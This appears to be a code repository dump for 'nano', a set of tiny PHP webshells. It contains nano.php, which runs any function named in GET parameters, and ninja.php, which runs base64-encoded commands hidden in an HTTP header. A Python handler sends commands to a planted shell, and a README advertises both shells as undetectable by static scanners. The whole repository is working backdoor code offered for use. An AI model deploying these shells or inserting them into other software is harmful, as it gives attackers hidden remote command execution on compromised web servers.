[
  {
    "path": ".gitattributes",
    "content": "* linguist-language=PHP\n"
  },
  {
    "path": ".whitesource",
    "content": "{\n  \"generalSettings\": {\n    \"shouldScanRepo\": true\n  },\n  \"checkRunSettings\": {\n    \"vulnerableCheckRunConclusionLevel\": \"failure\"\n  }\n}"
  },
  {
    "path": "README.md",
    "content": "# nano\nNano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.\\\nPut it on watch maybe, I will continue to upload more webshells in here.\n\n### Nano\n```php\n<?=$_GET[p]==_&&$_GET[f]($GET_[c]);\n```\n#### Features\n- 35 bytes in size\n- Can't be detected by static code scanners\n- Supports authentication\n\n#### Usage\n`http://example.com/nano.php?f=function&c=command&p=password`\n\n`f` is for function\\\n`c` is for command\\\n`p` is for password\n\nFor example, the code below will execute the `ls` command:\n\n`http://example.com/nano.php?f=system&c=ls&p=password`\n\n### Ninja\n```php\n<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);\n```\n#### Features\n- 93 bytes in size\n- Fully Undetectable\n\n#### Usage\nThis one a bit complex.\\\nLets say you want to run `system(ls)` so write it as `system~ls` and then base64 encode it i.e. `c3lzdGVtKGxzKQ==`\\\nNow add any **1** character at the start of it. Let say 'x' so it will be `xc3lzdGVtKGxzKQ==`\\\nNow open your terminal and type the following command\\\n`curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php`\\\nToo much work? You can use the [handler](https://github.com/s0md3v/nano/blob/master/handler.py) instead.\n\n![handler](https://i.imgur.com/hkAHGwH.png)\n\n#### Everything Else\nThis is my first php thingy so if there's way to do what I did in a better way please let me know or open a pull request.\\\nThe nano project is licensed under **MIT license** which basically means you have to give me credit if you want to redistribute or modify it.\n"
  },
  {
    "path": "handler.py",
    "content": "import requests\nimport sys\nimport random\nimport base64\n\nwhite = '\\033[97m'\ngreen = '\\033[92m'\nred = '\\033[91m'\nyellow = '\\033[93m'\nend = '\\033[0m'\nback = '\\033[7;91m'\ninfo = '\\033[33m[!]\\033[0m'\nque = '\\033[34m[?]\\033[0m'\nbad = '\\033[31m[-]\\033[0m'\ngood = '\\033[32m[+]\\033[0m'\nrun = '\\033[97m[~]\\033[0m'\n\nif sys.version_info[0]==2:\n    input = raw_input\n    from urlparse import urlparse\nelse:\n    from urllib.parse import urlparse\n\nprint ('''%s1.%s Nano\n%s2.%s Ninja\\n''' % (green, end, green, end))\nshell = input('%s Select the shell type: ' % que)\nif shell == '1':\n    shell = 'nano'\n    url = input('%s Enter the URL of shell: ' % que)\n    passwd = input('%s Enter password: ' % que)\nif shell == '2':\n    shell = 'ninja'\n    url = input('%s Enter the URL of shell: ' % que)\nfunction = input('%s Enter the function to use: ' % que)\nif not url.startswith('http'):\n    url = 'http://' + url\n\nuser_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0',\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991']\n\ndef requester(url, payload, shell):\n    headers = {\n'Host' : urlparse(url).hostname,\n'User-Agent' : random.choice(user_agents),\n'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n'Accept-Language' : 'en-US,en;q=0.5',\n'Accept-Encoding' : 'deflate',\n'Connection' : 'close',\n'DNT' : '1',\n'Connection' : 'close',\n'Upgrade-Insecure-Requests' : '1'}\n    if shell == 'nano':\n        payload = '?f=%s&c=%s&p=%s' % (function, payload, passwd)\n        print (requests.get(url + payload , headers=headers).text)\n    elif shell == 'ninja':\n        bases = ['T', 'w', 'F', 'v', 'Z', 'n']\n        payload = random.choice(bases) + (base64.b64encode((function + '~' + payload).encode('utf-8'))).decode('utf-8')\n        headers['x'] = payload\n        print (requests.get(url, headers=headers).text)\nwhile True:\n    payload = input('%s>%s ' % (green, end))\n    requester(url, payload, shell)\n"
  },
  {
    "path": "nano.php",
    "content": "<?=$_GET[p]==_&&$_GET[f]($_GET[c]);\n"
  },
  {
    "path": "ninja.php",
    "content": "<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);\n"
  }
]